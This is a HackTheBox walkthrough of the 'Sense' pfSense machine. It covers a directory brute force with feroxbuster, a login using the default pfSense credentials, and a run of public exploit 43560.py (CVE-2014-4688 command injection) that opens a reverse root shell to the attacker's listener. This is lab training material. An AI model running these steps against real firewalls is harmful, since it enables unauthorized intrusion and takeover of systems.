Hack The Box

HackTheBox “Sense” Walkthrough

Sense, an easy-level FreeBSD OS machine on HackTheBox, revolves around identifying user credentials for a pfSense Firewall machine, a task that forms the foundation of this endeavor. Moreover, exploiting a well-known…

HackTheBox “Sense” Walkthrough, figure 1

Sense, an easy-level FreeBSD OS machine on HackTheBox, revolves around identifying user credentials for a pfSense Firewall machine, a task that forms the foundation of this endeavor. Moreover, exploiting a well-known command injection vulnerability that impacts the product becomes pivotal in achieving root-level access on the machine.

Let’s get started! 🚀

Recon & Enumeration

Let’s use nmap to scan for open ports and services:

HackTheBox “Sense” Walkthrough, figure 2

Next, proceed to access the IP address through a web browser.

HackTheBox “Sense” Walkthrough, figure 3

Upon accessing the IP address, we are greeted with a pfsense login page. Now, let’s proceed to conduct a directory brute force using Feroxbuster.

HackTheBox “Sense” Walkthrough, figure 4
┌──(kali㉿kali)-[~]└─$ feroxbuster -u https://10.10.10.60/ -x php,html,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 100 -s 200,301 -n ___  ___  __   __     __      __         __   ___|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___by Ben "epi" Risher 🤓                 ver: 2.10.0───────────────────────────┬────────────────────── 🎯  Target Url            │ https://10.10.10.60/ 🚀  Threads               │ 100 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 👌  Status Codes          │ [200, 301] 💥  Timeout (secs)        │ 7 🦡  User-Agent            │ feroxbuster/2.10.0 💉  Config File           │ /etc/feroxbuster/ferox-config.toml 🔎  Extract Links         │ true 💲  Extensions            │ [php, html, txt] 🏁  HTTP methods          │ [GET] 🔓  Insecure              │ true 🚫  Do Not Recurse        │ true───────────────────────────┴────────────────────── 🏁  Press [ENTER] to use the Scan Management Menu™──────────────────────────────────────────────────301      GET        0l        0w        0c https://10.10.10.60/themes => https://10.10.10.60/themes/200      GET        0l        0w        0c https://10.10.10.60/200      GET        0l        0w        0c https://10.10.10.60/index.php200      GET        0l        0w        0c https://10.10.10.60/help.php200      GET        0l        0w        0c https://10.10.10.60/stats.php301      GET        0l        0w        0c https://10.10.10.60/css => https://10.10.10.60/css/301      GET        0l        0w        0c https://10.10.10.60/includes => https://10.10.10.60/includes/200      GET        0l        0w    52556c https://10.10.10.60/fred.png200      GET       24l       32w      329c https://10.10.10.60/index.html301      GET        0l        0w        0c https://10.10.10.60/javascript => https://10.10.10.60/javascript/200      GET        0l        0w        0c https://10.10.10.60/edit.php200      GET        0l        0w        0c https://10.10.10.60/license.php200      GET        0l        0w        0c https://10.10.10.60/system.php200      GET        0l        0w        0c https://10.10.10.60/status.php200      GET       10l       40w      271c https://10.10.10.60/changelog.txt301      GET        0l        0w        0c https://10.10.10.60/classes => https://10.10.10.60/classes/301      GET        0l        0w        0c https://10.10.10.60/widgets => https://10.10.10.60/widgets/200      GET        0l        0w        0c https://10.10.10.60/exec.php200      GET        0l        0w        0c https://10.10.10.60/graph.php301      GET        0l        0w        0c https://10.10.10.60/tree => https://10.10.10.60/tree/200      GET        0l        0w        0c https://10.10.10.60/wizard.php301      GET        0l        0w        0c https://10.10.10.60/shortcuts => https://10.10.10.60/shortcuts/200      GET        0l        0w        0c https://10.10.10.60/pkg.php301      GET        0l        0w        0c https://10.10.10.60/installer => https://10.10.10.60/installer/301      GET        0l        0w        0c https://10.10.10.60/wizards => https://10.10.10.60/wizards/200      GET       17l       26w      384c https://10.10.10.60/xmlrpc.php200      GET        0l        0w        0c https://10.10.10.60/reboot.php200      GET        0l        0w        0c https://10.10.10.60/interfaces.php301      GET        0l        0w        0c https://10.10.10.60/csrf => https://10.10.10.60/csrf/200      GET        7l       12w      106c https://10.10.10.60/system-users.txt301      GET        0l        0w        0c https://10.10.10.60/filebrowser => https://10.10.10.60/filebrowser/[####################] - 2h    882192/882192  0s      found:31      errors:15224  [####################] - 2h    882184/882184  125/s   https://10.10.10.60/

The files changelog-txt and system-user-txt appear to contain valuable information. Let's attempt to view their content in our browser.

The contents of changelog.txt are as follows:

HackTheBox “Sense” Walkthrough, figure 5

The contents of system-users.txt are as follows:

HackTheBox “Sense” Walkthrough, figure 6

system-users.txt includes the username “Rohit” and a password, “company defaults,” which appears unlikely to be a valid password. Let’s attempt using the default password for pfSense software, “pfsense.”

HackTheBox “Sense” Walkthrough, figure 7

we land on Rohit’s pfSense dashboard. Now, let’s utilize searchsploit to examine any known vulnerabilities associated with pfsense 2.1.3.

HackTheBox “Sense” Walkthrough, figure 8

Exploitation:

We will proceed with attempting the exploit CVE-2014–4688.

pfSense < 2.1.4 — ‘status_rrd_graph_img.php’ Command Injection | php/webapps/43560.py

Download the exploit script to our current working directory and examine its contents.

HackTheBox “Sense” Walkthrough, figure 9

Upon reviewing the script, we find that the following inputs are required as shown in the snippet below: — rhost, — lhost, — lport, — username, — password.

HackTheBox “Sense” Walkthrough, figure 10

Hence, we are required to launch a listener.

HackTheBox “Sense” Walkthrough, figure 11

Execute the exploit by running the command provided below.

python3 43560.py — rhost 10.10.10.60 — lhost 10.10.14.8 — lport 4343 — username rohit — password pfsense
HackTheBox “Sense” Walkthrough, figure 12

Executing the command provides us with a root shell.

HackTheBox “Sense” Walkthrough, figure 13

Cheers.